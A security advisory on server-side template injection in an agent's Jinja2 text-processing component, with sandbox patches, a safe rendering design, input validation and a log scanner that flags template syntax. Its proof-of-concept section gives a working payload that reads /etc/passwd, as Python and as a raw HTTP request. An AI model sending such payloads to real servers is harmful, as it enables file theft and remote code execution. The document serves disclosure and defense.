# Vulnerability Summary: Server-Side Template Injection (SSTI) in Agent "Text Processing" Component

## Vulnerability Overview

* **Vulnerability Type**: Server-Side Template Injection (SSTI) leading to Remote Code Execution (RCE).
* **Affected Component**: "Text Processing" component in `agent.py`.
* **Description**: This component passes user input directly to the Jinja2 template engine as template source, without filtering or escaping. Attackers can craft template injection payloads that execute arbitrary Python code on the server.
* **Affected Versions**:
  * `agent.py` (all versions < 1.0.0)
  * `text_processing.py` (all versions < 1.0.0)
* **Root Cause**: In `text_processing.py`, the `render_template` function uses user-provided input directly as template content.

## Remediation

* **Recommended Fix**: Use a sandboxed environment (e.g., `SandboxedEnvironment`) to restrict template engine capabilities, or implement strict input validation with a whitelist.
* **Patch (for agent.py)**:

  ```python
  from jinja2.sandbox import SandboxedEnvironment

  def process_text(text):
      # Use the sandboxed environment: its attribute checks refuse
      # underscore-prefixed names such as __class__ and raise SecurityError
      env = SandboxedEnvironment()
      # Do not expose Python builtins through template globals
      env.globals['__builtins__'] = {}
      template = env.from_string(text)
      return template.render()
  ```

* **Patch (for text_processing.py)**:

  ```python
  from jinja2.sandbox import SandboxedEnvironment

  def render_template(template_string):
      # Use the sandboxed environment: its attribute checks refuse
      # underscore-prefixed names such as __class__ and raise SecurityError
      env = SandboxedEnvironment()
      # Do not expose Python builtins through template globals
      env.globals['__builtins__'] = {}
      template = env.from_string(template_string)
      return template.render()
  ```

* **Additional Mitigation Measures**: Implement input validation, enforce input length limits, and use whitelisting for allowed content.
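The root-cause pattern beside the advisory's sandbox fix and the design that removes the injection point altogether, as an added example that is not the advisory's or the project's own code. The function names, the fixed template and the `PROBE` string are assumptions; only `jinja2` is required.

```python
# Added example, not the advisory's or the project's own code: the root-cause
# pattern, the advisory's SandboxedEnvironment fix, and the pattern that never
# parses user input as template syntax. Names (render_vulnerable,
# render_sandboxed, sandbox_blocks, render_as_data, PROBE) are assumptions.
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment, SecurityError

# Constructed probe shaped like the advisory's payload: walks from a string
# literal to its class and MRO. It shows whether attribute traversal into
# Python internals is possible at all, which is what the real payload needs.
PROBE = "{{ ''.__class__.__mro__ }}"


def render_vulnerable(user_text: str) -> str:
    """Root cause: user input becomes the template *source*, so every
    expression inside {{ }} is evaluated with full Python object access."""
    return Environment().from_string(user_text).render()


def render_sandboxed(user_text: str) -> str:
    """The advisory's recommended fix: same pattern, but under
    SandboxedEnvironment, whose attribute checks refuse names starting with
    an underscore and raise SecurityError when such a value is used further."""
    env = SandboxedEnvironment()
    return env.from_string(user_text).render()


def sandbox_blocks(user_text: str) -> bool:
    """True if the sandbox refuses to render the input."""
    try:
        render_sandboxed(user_text)
    except SecurityError:
        return True
    return False


# Preferred design: the template is a fixed string under developer control,
# user text is passed as a context variable and autoescaped. Nothing the
# user sends is ever parsed as template syntax, so there is no sandbox to
# escape from.
_FIXED = Environment(autoescape=True).from_string("<p>Processed: {{ text }}</p>")


def render_as_data(user_text: str) -> str:
    return _FIXED.render(text=user_text)


if __name__ == "__main__":
    print(render_vulnerable("{{ ''.__class__ }}"))   # evaluated: <class 'str'>
    print(sandbox_blocks(PROBE))                     # True
    print(render_as_data("{{ ''.__class__ }}"))      # echoed as text, not evaluated
```

The sandbox is defense in depth, not a substitute for the third pattern: it still lets untrusted input drive the template parser, and its safety rests on the attribute checks being complete. Treating user text as data removes the parser from the attack surface entirely.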
## Proof of Concept (PoC) / Exploitation Code

The following PoC examples demonstrate exploitation of the vulnerability:

**Python Code Example:**

```python
import requests

# Craft malicious payload
payload = "{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}"

# Send request
response = requests.post('http://target/agent/process_text', data={'text': payload})
print(response.text)
```

**HTTP Request Example:**

```http
POST /agent/process_text HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

text={{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
```
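The advisory's additional mitigations (length limit, whitelist validation) as a request-side check, and the same check run over access-log lines to surface probes against the affected endpoint, as an added example that is not part of the advisory or the project. The log format, the limit, the whitelist and the names `validate_text` and `scan_log` are assumptions; the endpoint path is the one from the PoC above.

```python
# Added example, not from the advisory: input validation for the `text`
# field plus a log check that flags requests carrying template syntax.
# Log format, MAX_TEXT_LEN, ALLOWED, validate_text and scan_log are
# assumptions; only the Python standard library is used.
import re
from urllib.parse import parse_qs

MAX_TEXT_LEN = 2000  # assumed limit for the `text` field

# Whitelist of what the feature legitimately needs: word characters,
# whitespace and ordinary punctuation. Braces, percent signs and angle
# brackets are deliberately absent, so template delimiters can never pass.
ALLOWED = re.compile(r"[\w\s.,;:!?'\"()\-]*")

# Jinja2 delimiters and dunder names: lets detection distinguish "template
# syntax" from a merely unusual character and alert on the former.
TEMPLATE_SYNTAX = re.compile(r"\{\{|\{%|\{#|__\w+__")


def validate_text(text):
    """Return (accepted, reason). Run this before any template code sees
    the input; the reason string doubles as an alert category."""
    if len(text) > MAX_TEXT_LEN:
        return False, "too long"
    if TEMPLATE_SYNTAX.search(text):
        return False, "template syntax"
    if not ALLOWED.fullmatch(text):
        return False, "disallowed characters"
    return True, "ok"


# Constructed log lines in an assumed format:
#   <timestamp> <client> <method> <path> <urlencoded body>
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 POST /agent/process_text text=Hello+there
2024-05-01T10:00:02Z 10.0.0.9 POST /agent/process_text text=%7B%7B+%27%27.__class__.__mro__+%7D%7D
2024-05-01T10:00:03Z 10.0.0.7 POST /agent/process_text text=A+tad+long%3F
2024-05-01T10:00:04Z 10.0.0.9 GET /agent/status -
"""


def scan_log(lines, path="/agent/process_text"):
    """Return [(client, reason)] for POSTs to `path` whose `text` field
    fails validation. Bodies are URL-decoded first so encoded braces
    (%7B%7B) are seen as the delimiters they are."""
    findings = []
    for line in lines:
        parts = line.split(maxsplit=4)
        if len(parts) < 5 or parts[2] != "POST" or parts[3] != path:
            continue
        body = parse_qs(parts[4])
        for text in body.get("text", []):
            ok, reason = validate_text(text)
            if not ok:
                findings.append((parts[1], reason))
    return findings


if __name__ == "__main__":
    for client, reason in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{client}: {reason}")
```

Validation of this kind is a complement to the rendering fix, not a replacement: a whitelist stops payloads at the door and gives you a clean signal to log, but the safe rendering pattern is what guarantees that anything slipping past is still harmless.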